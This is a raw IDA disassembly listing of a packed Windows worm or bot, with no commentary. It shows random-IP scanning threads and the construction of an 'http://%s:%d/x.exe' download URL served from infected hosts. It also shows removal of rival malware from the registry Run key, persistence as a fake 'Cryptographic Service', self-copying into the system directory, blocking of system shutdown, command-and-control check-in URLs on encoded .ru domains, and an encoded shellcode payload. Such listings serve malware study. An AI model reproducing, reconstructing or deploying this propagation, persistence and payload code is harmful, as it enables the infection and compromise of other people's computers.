cmp [ebp+var_7C], 0Eh
jnb short loc_31432687
mov eax, [ebp+var_7C]
push [ebp+eax*4+var_50]
call sub_314320E4
pop ecx
inc [ebp+var_7C]
jmp short loc_3143266F
; ---------------------------------------------------------------------------
loc_31432687: ; CODE XREF: sub_3143256D+106�j
cmp [ebp+arg_0], edi
jz short loc_314326C5
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314310AC
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm20 ; "uterm20"
call sub_314320E4
pop ecx
mov dword_31435034, eax
loc_314326C5: ; CODE XREF: sub_3143256D+11D�j
call sub_314324C3
push edi
push offset sub_3143237F
call sub_314320F3
push edi
push offset sub_3143185D
call sub_314320F3
push edi
push offset loc_31432933
call sub_314320F3
add esp, 18h
loc_314326EE: ; CODE XREF: sub_3143256D+19C�j
call sub_31432559
test eax, eax
jnz short loc_3143270B
push edi
call dword_31431018 ; AbortSystemShutdownA
push 1388h
call dword_3143109C ; Sleep
jmp short loc_314326EE
; ---------------------------------------------------------------------------
loc_3143270B: ; CODE XREF: sub_3143256D+188�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3143256D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432728 proc near ; DATA XREF: sub_3143278A+54�o
; sub_31432810+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31432737
push 1
pop eax
jmp short locret_31432786
; ---------------------------------------------------------------------------
loc_31432737: ; CODE XREF: sub_31432728+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
mov [ebp+var_1], al
xor bl, bl
loc_31432740: ; CODE XREF: sub_31432728+59�j
call sub_31432559
test eax, eax
jnz short loc_31432783
call sub_314321F3
test eax, eax
jz short loc_31432783
cmp [ebp+var_1], bl
jz short loc_3143277C
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_314319BC
pop ecx
call dword_314310FC ; rand
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call dword_3143109C ; Sleep
loc_3143277C: ; CODE XREF: sub_31432728+2D�j
inc bl
cmp bl, 0FFh
jb short loc_31432740
loc_31432783: ; CODE XREF: sub_31432728+1F�j
; sub_31432728+28�j
xor eax, eax
pop ebx
locret_31432786: ; CODE XREF: sub_31432728+D�j
leave
retn 4
sub_31432728 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143278A proc near ; DATA XREF: sub_31432810+7E�o
; UPX0:314329CA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31432798
push 1
pop eax
jmp short loc_3143280C
; ---------------------------------------------------------------------------
loc_31432798: ; CODE XREF: sub_3143278A+7�j
push esi
push edi
call sub_314320B6
mov esi, dword_314310FC
xor edi, edi
loc_314327A7: ; CODE XREF: sub_3143278A+7C�j
call sub_31432559
test eax, eax
jnz short loc_31432808
call sub_314321F3
test eax, eax
jz short loc_31432808
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31435044
mov byte ptr [ebp+arg_0+3], al
call dword_314310D8 ; InterlockedIncrement
push [ebp+arg_0]
call sub_314319BC
test eax, eax
pop ecx
jnz short loc_314327EA
push [ebp+arg_0]
push offset sub_31432728
call sub_3143210D
pop ecx
pop ecx
loc_314327EA: ; CODE XREF: sub_3143278A+4F�j
call esi ; rand
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call dword_3143109C ; Sleep
inc edi
cmp edi, 8000h
jl short loc_314327A7
loc_31432808: ; CODE XREF: sub_3143278A+24�j
; sub_3143278A+2D�j
pop edi
xor eax, eax
pop esi
loc_3143280C: ; CODE XREF: sub_3143278A+C�j
pop ebp
retn 4
sub_3143278A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432810 proc near ; DATA XREF: UPX0:314329E2�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_314320B6
call sub_31432559
test eax, eax
jnz loc_314328C9
push ebx
mov ebx, dword_3143109C
push esi
mov esi, dword_314310FC
push edi
loc_31432836: ; CODE XREF: sub_31432810+48�j
; sub_31432810+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31432845: ; CODE XREF: sub_31432810+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31432845
call sub_314321B4
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31432836
call sub_314321F3
test eax, eax
jz short loc_314328A1
push offset dword_31435044
call dword_314310D8 ; InterlockedIncrement
push edi
call sub_314319BC
test eax, eax
pop ecx
jnz short loc_314328A8
push edi
push offset sub_31432728
call sub_3143210D
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3143288D: ; CODE XREF: sub_31432810+8D�j
push edi
push offset sub_3143278A
call sub_3143210D
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3143288D
jmp short loc_314328A8
; ---------------------------------------------------------------------------
loc_314328A1: ; CODE XREF: sub_31432810+51�j
push 2710h
call ebx ; Sleep
loc_314328A8: ; CODE XREF: sub_31432810+67�j
; sub_31432810+8F�j
call esi ; rand
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call ebx ; Sleep
call sub_31432559
test eax, eax
jz loc_31432836
pop edi
pop esi
pop ebx
loc_314328C9: ; CODE XREF: sub_31432810+11�j
push 0
call dword_314310D4 ; ExitThread
xor eax, eax
leave
retn 4
sub_31432810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314328D7 proc near ; CODE XREF: UPX0:314329A7�p
; UPX0:loc_31432A0D�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_314321B4
push eax
call dword_31431160 ; inet_ntoa
mov esi, dword_31431068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push dword_3143503C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_31431120 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314342E2
call esi ; lstrcpy
push offset byte_314342E0
call dword_31431088 ; lstrlen
mov byte_314342E0[eax], 0DFh
pop esi
leave
retn
sub_314328D7 endp
; ---------------------------------------------------------------------------
loc_31432933: ; DATA XREF: sub_3143256D+174�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31435044, ebx
call sub_314321F3
mov esi, dword_3143109C
mov edi, 1388h
test eax, eax
jnz short loc_31432961
loc_31432955: ; CODE XREF: UPX0:3143295F�j
push edi
call esi ; Sleep
call sub_314321F3
test eax, eax
jz short loc_31432955
loc_31432961: ; CODE XREF: UPX0:31432953�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31431134 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31435048, ebx
pop ebp
mov dword_3143504C, 96h
jz short loc_314329A0
mov dword_31435048, 1
mov ebp, 15Eh
mov dword_3143504C, 14h
loc_314329A0: ; CODE XREF: UPX0:31432985�j
call sub_314321B4
mov ebx, eax
call sub_314328D7
cmp ebx, 100007Fh
jz short loc_314329C1
push ebx
push offset sub_31432728
call sub_3143210D
pop ecx
pop ecx
loc_314329C1: ; CODE XREF: UPX0:314329B2�j
mov dword ptr [esp+10h], 4
loc_314329C9: ; CODE XREF: UPX0:314329DA�j
push ebx
push offset sub_3143278A
call sub_3143210D
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_314329C9
test ebp, ebp
jle short loc_314329F1
loc_314329E0: ; CODE XREF: UPX0:314329EF�j
push 0
push offset sub_31432810
call sub_3143210D
pop ecx
dec ebp
pop ecx
jnz short loc_314329E0
loc_314329F1: ; CODE XREF: UPX0:314329DE�j
; UPX0:314329FD�j ...
call sub_314321F3
test eax, eax
jz short loc_314329FF
push edi
call esi ; Sleep
jmp short loc_314329F1
; ---------------------------------------------------------------------------
loc_314329FF: ; CODE XREF: UPX0:314329F8�j
; UPX0:31432A0B�j
call sub_314321F3
test eax, eax
jnz short loc_31432A0D
push edi
call esi ; Sleep
jmp short loc_314329FF
; ---------------------------------------------------------------------------
loc_31432A0D: ; CODE XREF: UPX0:31432A06�j
call sub_314328D7
jmp short loc_314329F1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432A14 proc near ; CODE XREF: sub_31432BAD+93�p
; sub_31432D2E+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3143100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31432A47
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31431010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31431014 ; RegCloseKey
loc_31432A47: ; CODE XREF: sub_31432A14+1C�j
pop ebp
retn
sub_31432A14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432A49 proc near ; CODE XREF: sub_3143141F+28E�p
; sub_3143237F+33�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3143100C ; RegOpenKeyExA
test eax, eax
jz short loc_31432A75
push 1
pop eax
jmp short loc_31432A9F
; ---------------------------------------------------------------------------
loc_31432A75: ; CODE XREF: sub_31432A49+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31431008 ; RegQueryValueExA
test eax, eax
jz short loc_31432A94
push 2
pop esi
loc_31432A94: ; CODE XREF: sub_31432A49+46�j
push [ebp+arg_10]
call dword_31431014 ; RegCloseKey
mov eax, esi
loc_31432A9F: ; CODE XREF: sub_31432A49+2A�j
pop esi
leave
retn
sub_31432A49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432AA2 proc near ; CODE XREF: sub_3143141F+306�p
; sub_31432C62+96�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31431000 ; RegCreateKeyExA
test eax, eax
jz short loc_31432ACB
push 1
pop eax
jmp short loc_31432AF2
; ---------------------------------------------------------------------------
loc_31432ACB: ; CODE XREF: sub_31432AA2+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31431004 ; RegSetValueExA
test eax, eax
jz short loc_31432AE7
push 2
pop esi
loc_31432AE7: ; CODE XREF: sub_31432AA2+40�j
push [ebp+arg_4]
call dword_31431014 ; RegCloseKey
mov eax, esi
loc_31432AF2: ; CODE XREF: sub_31432AA2+27�j
pop esi
pop ebp
retn
sub_31432AA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432AF5 proc near ; CODE XREF: sub_31432BAD+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31431088 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_31432BA9
loc_31432B15: ; CODE XREF: sub_31432AF5+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31432B1E
dec esi
jns short loc_31432B15
loc_31432B1E: ; CODE XREF: sub_31432AF5+24�j
push 0
push 2
call sub_31432EFC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31432BA9
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31432EF6 ; Process32First
test eax, eax
jz short loc_31432BA9
lea esi, [esi+ebx+1]
loc_31432B66: ; CODE XREF: sub_31432AF5+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31431104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31432B96
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314310B4 ; OpenProcess
push 0
push eax
call dword_31431060 ; TerminateProcess
loc_31432B96: ; CODE XREF: sub_31432AF5+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31432EF0 ; Process32Next
test eax, eax
jnz short loc_31432B66
loc_31432BA9: ; CODE XREF: sub_31432AF5+1A�j
; sub_31432AF5+38�j ...
pop esi
pop ebx
leave
retn
sub_31432AF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432BAD proc near ; CODE XREF: UPX0:31432536�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31432C1D: ; CODE XREF: sub_31432BAD+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_31432C54
push ebx
push edi
push esi
call sub_31432A14
lea eax, [ebp+var_13C]
push eax
call sub_31432AF5
add esp, 10h
loc_31432C54: ; CODE XREF: sub_31432BAD+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31432C1D
pop edi
pop esi
pop ebx
leave
retn
sub_31432BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432C62 proc near ; CODE XREF: sub_31432D2E+D1�p
; sub_31432D2E+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31432C77
push [ebp+arg_0]
call dword_31431074 ; DeleteFileA
loc_31432C77: ; CODE XREF: sub_31432C62+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31431090 ; GetSystemDirectoryA
test eax, eax
jz locret_31432D2C
push esi
call dword_314310FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_3143212E
mov esi, dword_3143108C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314341F0
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset dword_314341F8
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31431050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31431088 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_31432AA2
add esp, 14h
push dword_31435034
call dword_31431080 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31431054 ; WinExec
push 1F4h
call dword_3143109C ; Sleep
push 0
call dword_314310E4 ; ExitProcess
pop esi
locret_31432D2C: ; CODE XREF: sub_31432C62+23�j
leave
retn
sub_31432C62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432D2E proc near ; CODE XREF: UPX0:3143253B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31431048 ; GetModuleFileNameA
test eax, eax
jz loc_31432E67
and dword_31435050, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_1 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jz short loc_31432DB4
call dword_314310FC ; rand
push 0Ah
mov ebx, offset aJaeanaakqdhgry ; "jaeanaakqdhgryp"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_3143212E
pop ecx
pop ecx
push ebx
call dword_31431088 ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_31432AA2
add esp, 14h
jmp short loc_31432DC3
; ---------------------------------------------------------------------------
loc_31432DB4: ; CODE XREF: sub_31432D2E+4D�j
lea eax, [ebp+var_20]
push eax
push offset aJaeanaakqdhgry ; "jaeanaakqdhgryp"
call dword_31431068 ; lstrcpy
loc_31432DC3: ; CODE XREF: sub_31432D2E+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jz short loc_31432E09
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_31432AA2
lea eax, [ebp+var_84]
push eax
push 0
call sub_31432C62
add esp, 1Ch
jmp short loc_31432E67
; ---------------------------------------------------------------------------
loc_31432E09: ; CODE XREF: sub_31432D2E+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3143104C ; lstrcmpi
test eax, eax
jnz short loc_31432E52
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_31432E67
push ebx
push edi
push esi
mov dword_31435050, 1
call sub_31432A14
add esp, 0Ch
jmp short loc_31432E67
; ---------------------------------------------------------------------------
loc_31432E52: ; CODE XREF: sub_31432D2E+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31432C62
pop ecx
pop ecx
loc_31432E67: ; CODE XREF: sub_31432D2E+1F�j
; sub_31432D2E+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31432D2E endp
; =============== S U B R O U T I N E =======================================
sub_31432E6C proc near ; CODE XREF: sub_314311A0+CA�p
; sub_31431782+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31431044 ; VirtualAlloc
retn
sub_31432E6C endp
; =============== S U B R O U T I N E =======================================
sub_31432E80 proc near ; CODE XREF: sub_314311A0+10B�p
; sub_31431782+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31431040 ; VirtualFree
retn
sub_31432E80 endp
; ---------------------------------------------------------------------------
align 10h
loc_31432EA0: ; DATA XREF: sub_3143141F+A�o
; sub_3143256D+A�o
jmp dword ptr loc_31431100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EA6 proc near ; CODE XREF: sub_314319BC+128�p
; sub_314319BC+134�p ...
jmp dword_314310F8
sub_31432EA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EAC proc near ; CODE XREF: sub_314319BC+9C�p
; sub_314319BC+C5�p ...
jmp dword_314310F4
sub_31432EAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EB2 proc near ; CODE XREF: sub_314319BC+93�p
; sub_314319BC+B2�p ...
jmp dword_314310F0
sub_31432EB2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31432EC0 proc near ; CODE XREF: sub_314319BC+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31432EE0
loc_31432ECC: ; CODE XREF: sub_31432EC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31432ECC
loc_31432EE0: ; CODE XREF: sub_31432EC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31432EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EF0 proc near ; CODE XREF: sub_31432AF5+AB�p
jmp dword_31431064
sub_31432EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EF6 proc near ; CODE XREF: sub_31432AF5+64�p
jmp dword_3143105C
sub_31432EF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EFC proc near ; CODE XREF: sub_31432AF5+2D�p
jmp dword_31431058
sub_31432EFC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 43Fh dup(0)
dword_31434000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_3143141F+11D�o
; sub_3143141F+20F�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31431782+84�o
align 10h
byte_31434080 db 0 ; DATA XREF: sub_3143185D+1B�r
off_31434081 dd offset dword_314341E4 ; DATA XREF: sub_3143185D+23�r
align 2
dd offset dword_314341D4
dw 0C401h
dd 1314341h, 314341B4h, 4341A000h, 41900131h, 80013143h
dd 314341h, 31434174h, 43416800h, 41580131h, 48003143h
dd 1314341h, 3143413Ch, 43417400h, 41D40131h, 30003143h
dd 314341h, 314341D4h, 43412001h, 41480031h, 10013143h
dd 314341h, 31434130h, 43410001h, 40F80131h, 74003143h
dd 314341h, 31434130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314341D4 dd 72617778h, 6A632E65h, 656E2E62h, 74h ; DATA XREF: UPX0:31434086�o
dword_314341E4 dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_31434081�o
dword_314341F0 dd 6578652Eh, 0 ; DATA XREF: sub_314311A0+75�o
; sub_31432239+55�o ...
dword_314341F8 dd 5Ch ; DATA XREF: sub_314311A0+49�o
; sub_31432C62+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314311A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31431313+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31431313+C�o
align 4
aD db '%d',0 ; DATA XREF: sub_3143141F+2CC�o
align 4
dword_3143426C dd 444952h ; DATA XREF: sub_3143141F+266�r
aSoftwareMicros db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3143141F+259�o
aZer1 db 'zer1',0 ; DATA XREF: sub_3143141F:loc_314315B7�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_3143141F+34�o
align 4
aHttpS db 'http://%s',0 ; DATA XREF: sub_31431782+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=20&cnt=%s',0
; DATA XREF: sub_31431782+57�o
align 10h
byte_314342E0 db 0EBh ; DATA XREF: sub_314319BC+24E�o
; sub_314319BC+260�o ...
db 58h
word_314342E2 dw 7468h ; DATA XREF: sub_314328D7+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
